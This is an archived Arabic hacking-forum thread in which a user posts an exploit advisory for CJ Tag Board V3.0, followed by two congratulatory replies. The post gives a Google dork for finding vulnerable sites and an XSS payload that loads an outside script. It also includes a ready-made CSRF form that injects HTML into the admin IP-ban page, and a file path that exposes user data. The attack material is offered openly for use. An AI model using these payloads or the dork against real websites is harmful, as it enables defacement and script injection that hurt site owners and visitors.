:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   CJ Tag Board V3.0 <= Multiple Vulnerabilities (http://www.vbspiders.com/vb/t61859.html)

Dr.NaNo 04-13-2012 06:54 AM
CJ Tag Board V3.0 <= Multiple Vulnerabilities
 
بسم الله الرحمن الرحيم.
السلام عليكم ورحمه الله وبركاته.




كود:
# Exploit Title: CJ Tag Board V3.0 <= Multiple Vulnerabilities
# Author: Dr.NaNo
# Software Link: http://www.cj-design.com/products/free-downloads/php-scripts/cjtagboard
# Version: 3.0
# Tested on: Linux-Red-Hat
# Google Dork: powered By CJ Tag Board V3.0
#
########################################################
#                    ~ P0c/Exploit ~                  #
########################################################
 

 |1|- Cross Site Scripting :

http://localhost/7/details.php?name={XSS}

    ~ For Example ~

http://localhost/{PaTh}/details.php?name=<SCRIPT SRC=http://localhost/XSS.js></SCRIPT>

http://localhost/{PaTh}/details.php?name=<center><h1>Dr.NaNo</H1> <DIV style="DISPLAY: none"><textarea>


 |2|- Cross Site Request Forgery : <== ( HTML Injection ).


<html>
<head>
</head>
<body>
<form action="http://localhost/{PaTh}/admin_index.php?action=ipban" method="post">
<input type="hidden" name="submit" value="submit">
<input type="hidden" name="submit" value="submit">
<textarea cols="50" rows="20" name="banned">
<html><title>ThankS !</title><body><b>Dr.NaNo - Exploit-db</b></body></html>
</textarea><br>
<input type="submit" value="ThankS !">
</form>
</body>
</html>

Go To => http://localhost/{PaTh}/ipban.php xD:


 |3|- Information Disclosure : <== ( This Information All Writers ).

http://localhost/{PaTh}/tag.txt


#### ~ Greetz ~ #########################################################
#                                                                      #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020  #
#                                                                      #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng    #
#                                                                      #
############################################### ~ All FriendS ~ #########
.More

aircrack -ng 04-13-2012 06:42 PM
رد: CJ Tag Board V3.0 <= Multiple Vulnerabilities
 
ماشاء الله وتبارك الله مبدع كالعاده اخي نانو
موفق باذن الله

dz.29 04-13-2012 06:55 PM
رد: CJ Tag Board V3.0 <= Multiple Vulnerabilities
 
الله يبارك عليك اخي نانو


الله يرحم والديك


الساعة الآن 09:53 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0